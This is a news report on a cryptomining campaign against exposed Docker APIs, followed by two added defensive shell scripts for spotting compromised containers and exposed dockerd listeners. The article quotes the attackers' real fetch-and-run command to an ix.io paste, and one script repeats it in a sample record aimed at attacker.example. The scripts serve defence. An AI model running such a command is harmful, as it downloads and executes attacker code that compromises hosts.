Hackers are scanning the Internet for exposed Docker platforms in order to deploy a cryptominer and make money.
Professionals behind the hacking campaign
According to researchers, the mass scanning campaign was launched over the weekend of November 24. It immediately caught the researchers' attention because of its wide scope.
Troy Mursch, lead researcher and co-founder of Bad Packets LLC, said that exploiting exposed Docker platforms is nothing new. It happens often.
“What set this campaign apart was the wide scan range. This in itself required further research to find out where this targeted botnet was coming from,” he said.
What do we know so far?
So far, the researchers have found that the hacking group behind this campaign has already scanned more than 59,000 IP networks (netblocks) looking for exposed Docker platforms.
If a vulnerable machine is found, the hackers use the API endpoint to start an Alpine Linux container, in which they run the following command:
chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;'
This command downloads and runs a Bash script from the attackers' server, which then installs the XMRig cryptominer. According to Mursch, over the weekend the hackers took in 14.82 Monero (XMR) coins, worth just about 740 dollars.
The researchers also noticed that the malware the hackers install has a self-defense measure.
“One unique but interesting function of this campaign is that it uninstalls known monitoring programs and "kills" various processes, via a script downloaded from http://ix[.]io/1XQh,” Mursch said.
Mursch also discovered that the malicious script has another function: it scans the infected computer for rConfig configuration files, which it encrypts and sends to the attackers' command and control server.
Craig H. Rowland, founder of Sandfly Security, also noted that the hackers create backdoor accounts in the compromised containers and leave SSH keys behind, so that they can get back in easily and remotely control all infected bots.
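For defenders triaging a Docker host, the behaviour described above (an Alpine container that bind-mounts the host filesystem, chroots into it and pipes a downloaded script into a shell, plus SSH keys left behind for persistence) can be checked for with a short POSIX shell script. This is an added example and not code from the article or from the researchers quoted; the docker inspect format string is an assumption about how the input records are produced, and the sample records, including the attacker.example URL, are constructed, not real forensic data.

```shell
#!/bin/sh
# Added example, not from the article: triage helpers for a Docker host that
# look for the artifacts described in the campaign write-up.
set -f   # we split strings on IFS below; never glob them

# check_container_line RECORD
# RECORD is one tab-separated line per container, assumed to come from
# (standard Docker Go templating; "join" is a built-in template function):
#   docker inspect --format \
#     '{{.Id}}\t{{.Config.Image}}\t{{join .Config.Cmd " "}}\t{{range .Mounts}}{{.Source}}:{{.Destination}};{{end}}' \
#     $(docker ps -q)
# Flags a container that bind-mounts the host root filesystem and runs a
# remote script through a shell inside a chroot of that mount. Always returns
# 0; the verdict is the first word of the printed line.
check_container_line() {
  tab="$(printf '\t')"
  oldifs="$IFS"; IFS="$tab"
  set -- $1
  IFS="$oldifs"
  id="$1"; image="$2"; cmd="$3"; mounts="$4"
  reasons=""; n=0
  # a mount whose source is "/" shows up as "/:" at the start or after a ";"
  case ";$mounts" in *";/:"*) reasons="$reasons host-root-mounted"; n=$((n+1)) ;; esac
  case "$cmd" in *chroot*)    reasons="$reasons chroot-into-mount"; n=$((n+1)) ;; esac
  case "$cmd" in *curl*\|*sh*|*wget*\|*sh*)
                              reasons="$reasons remote-script-piped-to-shell"; n=$((n+1)) ;; esac
  if   [ "$n" -ge 2 ]; then echo "SUSPICIOUS $id ($image):$reasons"
  elif [ "$n" -eq 1 ]; then echo "REVIEW $id ($image):$reasons"
  else                      echo "ok $id ($image)"
  fi
}

# recent_authorized_keys ROOT DAYS
# Lists authorized_keys files under ROOT modified within the last DAYS days;
# the researchers report that the attackers leave SSH keys behind.
recent_authorized_keys() {
  find "$1" -path '*/.ssh/authorized_keys' -type f -mtime -"$2" 2>/dev/null
}

# Constructed sample records (not real data): one container matching the
# described behaviour (placeholder URL attacker.example), one ordinary web server.
SAMPLE_RECORDS="$(printf '%s\t%s\t%s\t%s\n' \
  'c0ffee01' 'alpine:latest' \
  "chroot /mnt /bin/sh -c 'curl -sL4 http://attacker.example/payload | bash;'" '/:/mnt;' \
  'deadbeef02' 'nginx:1.17' 'nginx -g daemon off;' '/srv/www:/usr/share/nginx/html;')"

printf '%s\n' "$SAMPLE_RECORDS" | while IFS= read -r rec; do check_container_line "$rec"; done
echo "authorized_keys files changed in the last 7 days:"
recent_authorized_keys /root 7
recent_authorized_keys /home 7
```

A single indicator (for example a monitoring agent that legitimately mounts the host root) only yields REVIEW; two or more together yield SUSPICIOUS, which is the combination the campaign's container shows.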
For now, Mursch urges all users and companies running Docker platforms to check whether any API endpoints are exposed to the Internet and, if so, to act immediately.
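The check Mursch recommends can be made concrete with a small POSIX shell audit of a Docker host: which addresses dockerd is configured to listen on, and which it is actually listening on. This is an added example and not code from the article; it assumes the daemon's command line is obtained from a process listing and that live sockets are read from ss -lntp output, and the sample ss output embedded below is constructed.

```shell
#!/bin/sh
# Added example, not from the article: audit a Docker host for an API endpoint
# reachable from the network, the exposure this campaign scans for.
set -f   # strings are split on IFS below; never glob them

# Classify one dockerd listen address, as given to -H/--host or listed in the
# daemon.json "hosts" array. Local sockets and loopback are OK; any other
# tcp:// bind is reachable from the network.
classify_docker_host() {
  case "$1" in
    unix://*|fd://*)                                echo "OK       local-socket  $1" ;;
    tcp://127.*|tcp://localhost:*|tcp://\[::1\]:*)  echo "OK       loopback      $1" ;;
    tcp://*)                                        echo "EXPOSED  network-tcp   $1" ;;
    *)                                              echo "UNKNOWN  unrecognised  $1" ;;
  esac
}

# Audit a dockerd command line (assumed to come from `ps -o args= -C dockerd`).
# Every -H/--host value is classified; a network listener is marked PLAINTEXT
# when --tlsverify is absent, meaning no client authentication at all.
# Returns 1 if any network listener was found.
audit_dockerd_cmdline() {
  tls=0
  case " $1 " in *" --tlsverify "*|*" --tlsverify=true "*) tls=1 ;; esac
  exposed=0
  set -- $1
  while [ $# -gt 0 ]; do
    case "$1" in
      -H|--host)      shift; host="$1" ;;
      -H=*|--host=*)  host="${1#*=}" ;;
      *)              shift; continue ;;
    esac
    verdict="$(classify_docker_host "$host")"
    case "$verdict" in
      EXPOSED*) exposed=1
                if [ "$tls" -eq 1 ]; then echo "$verdict (TLS client auth required)"
                else echo "$verdict (PLAINTEXT, no --tlsverify)"; fi ;;
      *)        echo "$verdict" ;;
    esac
    shift
  done
  return $exposed
}

# Read `ss -lntp` output on stdin and report dockerd listening on a
# non-loopback address. Field 4 of each data line is Local Address:Port.
# Returns 1 if any such listener was found.
find_exposed_dockerd_listeners() {
  found=0
  while IFS= read -r line; do
    case "$line" in *'"dockerd"'*) ;; *) continue ;; esac
    set -- $line
    case "$4" in
      127.*|\[::1\]:*) ;;                         # loopback only
      *) found=1; echo "EXPOSED  dockerd listening on $4" ;;
    esac
  done
  return $found
}

# Constructed sample `ss -lntp` output (not captured from a real host).
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    127.0.0.1:2375    0.0.0.0:*     users:(("dockerd",pid=812,fd=9))
LISTEN 0      4096   0.0.0.0:2375      0.0.0.0:*     users:(("dockerd",pid=812,fd=10))
LISTEN 0      128    0.0.0.0:22        0.0.0.0:*     users:(("sshd",pid=640,fd=3))'

echo "== configured listeners"
audit_dockerd_cmdline 'dockerd -H fd:// -H tcp://0.0.0.0:2375' \
  || echo "=> remove the tcp:// listener, bind it to loopback, or require TLS client certificates"
echo "== live listeners"
printf '%s\n' "$SAMPLE_SS" | find_exposed_dockerd_listeners \
  || echo "=> firewall the port until the daemon configuration is fixed"
```

On a real host, replace the quoted command line with the output of the process listing and pipe live ss -lntp output into find_exposed_dockerd_listeners; a non-zero exit from either function means the API is reachable from the network.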